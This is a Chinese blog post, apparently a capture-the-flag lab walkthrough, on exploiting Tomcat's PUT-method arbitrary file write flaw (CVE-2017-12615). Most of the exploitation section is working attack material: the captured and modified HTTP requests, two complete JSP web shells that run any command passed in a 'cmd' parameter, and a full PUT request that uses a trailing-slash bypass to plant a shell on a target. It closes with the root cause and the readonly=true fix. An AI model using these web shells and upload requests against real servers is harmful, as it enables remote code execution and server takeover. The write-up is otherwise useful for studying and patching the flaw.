【Tomcat-8.5.19】文件写入漏洞

最新推荐文章于 2024-03-06 22:19:12 发布
最新推荐文章于 2024-03-06 22:19:12 发布
阅读量3.3k 收藏 6
点赞数 1
文章标签: tomcat java servlet
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63241485/article/details/126518420
版权

文章目录

tomcat

Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。由于有了Sun 的参与和支持,最新的Servlet 和JSP 规范总是能在Tomcat 中得到体现,Tomcat 5支持最新的Servlet 2.4 和JSP 2.0 规范。因为Tomcat 技术先进、性能稳定,而且免费,因而深受Java 爱好者的喜爱并得到了部分软件开发商的认可,成为比较流行的Web 应用服务器。

Tomcat 服务器是一个免费的开放源代码的Web 应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。对于一个初学者来说,可以这样认为,当在一台机器上配置好Apache 服务器,可利用它响应HTML(标准通用标记语言下的一个应用)页面的访问请求。实际上Tomcat是Apache 服务器的扩展,但运行时它是独立运行的,所以当你运行tomcat 时,它实际上作为一个与Apache 独立的进程单独运行的。

提示:以下是本篇文章正文内容,下面案例仅供参考

一、漏洞利用前提

1.使用burp刷新抓取网页请求包

当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被服务器执行。

2.漏洞危害

远程攻击者通过该漏洞可以写入任意文件,留下木马。

3.漏洞影响版本

Apache Tomcat 7.0.0 到 7.0.79

4.漏洞利用条件

需要Tomcat配置了可写(readonly=false)

readonly

false

二、漏洞利用步骤

1.burp抓取网页刷新数据包

修改好网页代理后,刷新,得到get请求包如下:

GET / HTTP/1.1
Host: xxx.xxx.xx.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=BB1EF97852A19983B06070A485A7F107
Upgrade-Insecure-Requests: 1

2.修改为put数据包

代码如下(示例):

PUT / HTTP/1.1
Host: xxx.xxx.xx.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 9

aihei

该处使用的url网络请求的数据。

3.构造简短的cmdjsp文件

其一

<%@ page import="java.io.*" %>
  <%
  try {
  String cmd = request.getParameter("cmd");
  Process child = Runtime.getRuntime().exec(cmd);
  InputStream in = child.getInputStream();
  int c;
  while ((c = in.read()) != -1) {
  out.print((char)c);
  }
  in.close();
  try {
  child.waitFor();
  } catch (InterruptedException e) {
  e.printStackTrace();
  }
  } catch (IOException e) {
  System.err.println(e);
  }
  %>

在这里插入代码片

其二


<%@ page import="java.util.*,java.io.*"%>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (unix)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "<BR>");
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
                out.println(disr); 
                disr = dis.readLine(); 
                }
        }
%>
</pre>
</BODY></HTML>

以上两个代码任选其一放入包体即可

4.构造put包体并发送至靶机

PUT /3.jsp/ HTTP/1.1
Host: 192.168.0.2:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 865

<%@ page import="java.util.*,java.io.*"%>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (unix)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "<BR>");
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
                out.println(disr); 
                disr = dis.readLine(); 
                }
        }
%>
</pre>
</BODY></HTML>

访问xxx.xx.x.x:xxxx/3.jsp?cmd=ls
剩下的就是自己翻靶机内容找flag了

总结

tomcat后端使用org.apache.catalina.servlets.JspServlet来处理jsp或是jspx后缀的请求, 而JspServlet负责处理所有JSP和JPSX类型的动态请求, 从代码没有发现处理HTTP PUT类型的操作,所以可知PUT以及DELTE等HTTP操作由DefautServelt实现。

该漏洞实际上是利用了windows下文件名解析的漏洞来触发的。 根本是通过构造特殊后缀名, 绕过Tomcat检测, 让Tomcat用DefaultServlet的逻辑处理请求, 从而上传jspwebshell文件。

然而,经过黑盒测试,当 PUT 地址为/1.jsp/时,仍然会创建 JSP,会影响 Linux 和 Windows 服务器,由于存在去掉最后的 / 的特性,那么这个漏洞自然影响 Linux 以及 Windows 版本。而且经过测试,这个漏洞影响全部的 Tomcat 版本,从 5.x 到 9.x 无不中枪。目前来说,最好的解决方式是将 conf/web.xml 中对于 DefaultServlet 的 readonly 设置为 true,才能防止漏洞。

夭-夜
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)
haha1314的博客
07-25 1779
Tomcat PUT方法任意写文件漏洞(CVE-2017-12615) Tomcat版本:8.5.19 Apache Tomcat 7.0.0 - 7.0.79 漏洞本质Tomcat配置了可写(readonly=false),导致我们可以往服务器写文件: <servlet> <servlet-name>default</servlet-name> ...
Tomcat8.5.34.0版本漏洞修复
modaner的博客
08-26 1135
5.替换tomcat相关文件 server.xml web.xml catalina.sh logs。2.停止tomcat服务,备份源tomcat文件夹只tomcat_bak目录。6.重命名apache-tomcat-8.5.79文件夹为tomcat漏洞1:拒绝式服务漏洞 组件远程代码执行漏洞 反序列话代码执行漏洞Tomcat8.5.34.0版本漏洞修复。漏洞2:AJP协议文件读取与包含严重漏洞。4.拷贝文件至/usr/local目录下。7.注释掉配置文件中的AJP协议。3.解压tomcat。...
一文了解Tomcat/8.5.19文件上传漏洞复现
allintao的博客
03-13 2943
这里返回201是成功的呢,说明我们的绕过成功了,然后这里我们要写相应的JSP木马在请求正文里,那么不会写的怎么办呢,这里可以像我一样用Godzilla一键生成,这里管理点开有个生成,并将有效载荷选择JavaDynamicPayload,点击生成。这里发现后缀为jsp的格式好像是上传不成功,那么我们可以尝试绕过,这里绕过的方式有很多,可以文件流绕过,可以空格绕过,可以"/"绕过,大家可以自己尝试,这里我用"/"绕过。很明显返回的值为201,说明是可行的,那我们直接上传JSP木马可不可以呢?
Tomcat漏洞详解
最新发布
m0_64481831的博客
03-06 1616
Tomcat是一种轻量级的web服务器,主要负责运行jsp和Servlet具有任意文件写入漏洞:主要影响7.0-7.8左右,原因是因为配置不当问题(conf/web.xml文件的readonly参数定义为false),导致可以使用PUT方法进行任意文件上传。jsp绕过方法有斜杠绕过、空格绕过和::$DATA绕过(后两者都需要在Windows下)具有文件包含漏洞:主要影响6和8版本,7和9版本有少数;原因是因为AJP协议存在缺陷而导致攻击者可以构造任意参数来进行任意文件包含和读取文件
Tomcat 又爆出高危漏洞!!Tomcat 8.5 ~10 中招…
Java技术栈,分享最主流的Java技术
07-06 7853
开源界最近很热闹啊,各个主流软件或框架漏洞频发,比如像 Struts2、FastJSON、Dubbo、Redis、Tomcat 等都存在各种各样的漏洞。 不要使用含有漏洞的组件每次也都被评为 OWASP 10 大安全漏洞之一。 光这半年以来,栈长知道的,通过公众号Java技术栈发布的就有 Dubbo、FastJSON、Tomcat: 2020年06月23日: 最新!Dubbo 远程代码执行漏洞通告,速度升级: https://mp.weixin.qq.com/s/t9GgYangGAeFTwtQA_dVfA
apache-tomcat-8.5.19.exe
06-05
Tomcat是由Apache软件基金会属下Jakarta项目开发的Servlet容器,按照Sun Microsystems提供的技术规范,实现了对ServletJavaServer Page(JSP)的支持,并提供了作为Web服务器的一些特有功能,如Tomcat管理和控制平台、安全局管理和Tomcat阀等。由于Tomcat本身也内含了HTTP服务器,因此也可以视作单独的Web服务器。但是,不能将Tomcat和Apache HTTP服务器混淆,Apache HTTP服务器是用C语言实现的HTTPWeb服务器;这两个HTTP web server不是捆绑在一起的。Apache Tomcat包含了配置管理工具,也可以通过编辑XML格式的配置文件来进行配置。
tomcat-jdbc-8.5.19.jar
05-31
Tomcat JDBC池软件包 org.apache.tomcat/tomcat-jdbc/8.5.19/tomcat-jdbc-8.5.19.jar
打靶之Tomcat/8.5.19
MKjelly的博客
06-03 203
将其发送到repeater中,并更改请求方式为PUT并上传文件,发现返回值为201,说明可以上传;观测到网页版本为Apache tomcat/8.5.19,网上搜索一下,发现其存在文件写入漏洞;因此,我们可以直接上传一个一句话木马的jsp文件并连接蚁剑,如果不会,可以直接搜索;但这里报错了,我们猜测可能是jsp格式问题,所以我们尝试绕过,这里我们采用/绕过;打开burp抓包工具,重新加载页面,发现其请求方式为GET;连接成功,也能访问到服务器下的目录,至此,打靶成功。页面正常,我们再将该链接添加到蚁剑。
【Apache Tomcat信息泄露漏洞
m0_46459413的博客
11-02 4068
9月28日,Apache发布安全公告,公开披露了Tomcat中的一个信息泄露漏洞(CVE-2021-43980)。由于某些Tomcat版本中的阻塞式读写的简化实现导致存在并发错误(极难触发),可能使客户端连接共享一个Http11Processor实例,导致响应或部分响应被错误的客户端接收,造成信息泄露。Apache Tomcat 版本 >= 10.1.0-M14。Apache Tomcat 版本 >= 10.0.20。Apache Tomcat 版本 >= 8.5.78。
tomcat中间件的文件上传漏洞
qq_57654664的博客
11-22 149
生成过后将jsp一句话木马复制到包中,使用put的传参方式发送一个shell.jsp的木马,这里密码和密钥随便输出,保证后面能够链接即可,选择JavaDynamicPayload的攻击载荷和java的加密器。接下来的步骤就简单很多了,通过哥斯拉连接文件,代理端口可以在不与现有已开启端口冲突的情况下,可以任意选择,密码密钥,有效载荷和加密器与之前建立的jsp木马的相契合即可。
apache-tomcat-8.5.19.tar.gz
06-05
Tomcat是由Apache软件基金会属下Jakarta项目开发的Servlet容器,按照Sun Microsystems提供的技术规范,实现了对ServletJavaServer Page(JSP)的支持,并提供了作为Web服务器的一些特有功能,如Tomcat管理和控制平台、安全局管理和Tomcat阀等。由于Tomcat本身也内含了HTTP服务器,因此也可以视作单独的Web服务器。但是,不能将Tomcat和Apache HTTP服务器混淆,Apache HTTP服务器是用C语言实现的HTTPWeb服务器;这两个HTTP web server不是捆绑在一起的。Apache Tomcat包含了配置管理工具,也可以通过编辑XML格式的配置文件来进行配置。
apache-tomcat-8.5.19-src.zip
06-08
Tomcat是由Apache软件基金会属下Jakarta项目开发的Servlet容器,按照Sun Microsystems提供的技术规范,实现了对ServletJavaServer Page(JSP)的支持,并提供了作为Web服务器的一些特有功能,如Tomcat管理和控制平台、安全局管理和Tomcat阀等。由于Tomcat本身也内含了HTTP服务器,因此也可以视作单独的Web服务器。但是,不能将Tomcat和Apache HTTP服务器混淆,Apache HTTP服务器是用C语言实现的HTTPWeb服务器;这两个HTTP web server不是捆绑在一起的。Apache Tomcat包含了配置管理工具,也可以通过编辑XML格式的配置文件来进行配置。
官方原版tomcat8.5.19 64位
08-03
官方原版tomcat8.5.19 64位
apache-tomcat-8.5.19.zip
06-05
Tomcat是由Apache软件基金会属下Jakarta项目开发的Servlet容器,按照Sun Microsystems提供的技术规范,实现了对ServletJavaServer Page(JSP)的支持,并提供了作为Web服务器的一些特有功能,如Tomcat管理和控制平台、安全局管理和Tomcat阀等。由于Tomcat本身也内含了HTTP服务器,因此也可以视作单独的Web服务器。但是,不能将Tomcat和Apache HTTP服务器混淆,Apache HTTP服务器是用C语言实现的HTTPWeb服务器;这两个HTTP web server不是捆绑在一起的。Apache Tomcat包含了配置管理工具,也可以通过编辑XML格式的配置文件来进行配置。
记一次tomcat漏洞修复补丁升级
热门推荐
shipaiYang的博客
05-26 2万+
tomcat有安全漏洞,现在用的版本是tomcat8.5.3。 其中有一个漏洞描述是这样子的:Apache Tomcat Security Manager 安全限制绕过漏洞(CVE-2016-5018)(其它的可以参照这个解决) 绿盟给的建议是: 有两个解决方案,一是直接升级到高版本或是打漏洞补丁。之前打过补丁但后来发现方法是错的,最后是以升级到高版本解决问题的。 升级到高版本的方法,...
中间件安全—Tomcat常见漏洞
剁椒鱼头没剁椒的博客
02-22 5260
链接。
tomcat8 后台getshell漏洞复现
weixin_54786196的博客
09-03 221
打开哥斯拉 生成jsp木马并保存。在url栏加上jmuma.jsp。找到刚刚jsp木马存放的位置。此时复制连接,用哥斯拉连接。将zip后缀改为war。在此位置上传war包。
TomcatTomcat多个版本存在信息泄漏漏洞
cnskylee的博客
05-20 3376
官方原文对于该漏洞的描述(看着这描述,比较费力,这里就不做翻译了)When using the RemoteIpFilter with requests received from a reverse proxy via HTTP that include the X-Forwarded-Proto header set to https, session cookies created by Apache Tomcat 11.0.0-M1 to 11.0.0.-M2, 10.1.0-M1 to 10.1
jQuery 1.4.1 中文参考
07-15
8.5.19 keyup() 141 8.5.20 keyup(fn) 141 8.5.21 load(fn) 141 8.5.22 mousedown(fn) 141 8.5.23 mousemove(fn) 142 8.5.24 mouseout(fn) 142 8.5.25 mouseover(fn) 142 8.5.26 mouseup(fn) 142 8.5.27 resize(fn) ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值